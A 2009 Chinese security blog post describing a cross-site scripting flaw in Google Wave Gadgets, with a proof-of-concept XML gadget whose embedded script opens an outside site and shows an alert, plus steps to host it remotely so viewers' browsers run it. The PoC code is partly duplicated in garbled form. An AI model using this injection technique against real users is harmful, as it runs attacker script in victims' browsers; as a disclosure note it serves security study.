Google Wave XSS

2009年12月08日 | category

学习笔记| 坏人咖啡

Google Wave 是 Google 的一款网络交流服务。它将电子邮件和即时通讯结合起来，使人们的交流更方便。Wave Gadget 是目前 Google Wave 两种扩展中的其中一种。Gadgets 是功能完备的应用。
Wave Gadget 可以引用一个外域的xml文件来实现用户所需要的功能。但是 Wave Gadget 却对其所引用的xml文件的内容没有做安全限制，这导致了该xml文件行可以执任意代码，被恶意用户利用。

POC：

新建一个xml文件，写入如下代码：

&lt;?xml version="1.0" encoding="UTF-8" ?&gt;
&lt;Module&gt;
&lt;ModulePrefs title="Hello Wave"&gt;
&lt;Require feature="wave" /&gt;
&lt;/ModulePrefs&gt;
&lt;Content type="html"&gt;
&lt;![CDATA[    
&lt;script type="text/javascript"&gt;
window.open('http://www.x3y3.org/')
alert('Just 4 Fun~ By ShadowHider');
&lt;/script&gt;
]]&gt;
&lt;/Content&gt;
&lt;/Module&gt;
&lt;/xml&gt;

<?xml version="1.0" encoding="UTF-8" ?>

</ModulePrefs>

<![CDATA[

window.open('http://www.x3y3.org/')

alert('Just 4 Fun~ By ShadowHider');

</script>

]]>

</Content>

</Module>

</xml>

然后将此xml文件上传至任意web空间，如 http://www.x3y3.org/s.xml

此后浏览该wave的用户的浏览器将会执行远程xml文件中的代码

所属分类: 学习笔记
Tags: google wave, XSS

« Google推出免费公共DNS服务器

终于能吃上做的饭了 »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

文章分类
热门标签
- 0DAY 360 bypass dreamhost ecshop google IE ie6 Linux mysql nginx php pin Python QQ Remote sql ubuntu windows XSS 人人网卸载后台命令咖啡备份字典微博忙提权攻击文件旁注本地注入源码漏洞爱情瑞星百度破解解析跨域跨站钓鱼
随机文章
文章归档
Users
- 登录

Google Wave XSS

没有评论

文章分类

热门标签

随机文章

文章归档

Users